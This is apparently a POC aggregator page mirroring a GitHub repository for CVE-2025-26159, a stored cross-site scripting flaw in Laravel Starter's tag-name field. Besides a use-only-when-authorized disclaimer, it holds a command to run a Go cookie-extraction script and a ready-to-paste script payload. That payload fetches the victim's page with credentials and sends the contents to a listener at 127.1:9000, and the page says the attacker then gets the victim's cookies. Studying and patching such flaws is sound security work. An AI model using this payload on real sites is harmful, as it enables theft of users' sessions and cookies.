POC详情: d03ca87b16ce46afa9c1f00d95535ea6d3edc584

来源
https://github.com/godBADTRY/CVE-2025-26159
关联漏洞
标题: Laravel Starter 安全漏洞 (CVE-2025-26159)
描述:Laravel Starter是Nasir Khan Saikat个人开发者的一个基于 Laravel 11.x 的简单入门项目。 Laravel Starter 11.11.0版本存在安全漏洞,该漏洞源于标签功能中对名称字段的输入处理不足,可能导致跨站脚本攻击。
描述
This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.
介绍
# CVE-2025-26159

> This script may only be used in authorized environments where explicit permission has been granted. The author is not responsible for any misuse, damage, or consequences resulting from the use of this script.


This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.

### Usage

To understand the explotation steps check out this [post](https://godbadtry.github.io/posts/CVE-2025-26159/) on my blog. 

```bash
go run CVE-2025-26159.go
```

In the tag name field of laravel starter add this payload:

```js
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
```

After a user visits the malicious tag's detail page, you will get his cookies.
文件快照

 [4.0K]  /data/pocs/d03ca87b16ce46afa9c1f00d95535ea6d3edc584
├── [1.7K]  CVE-2025-26159.go
└── [ 768]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。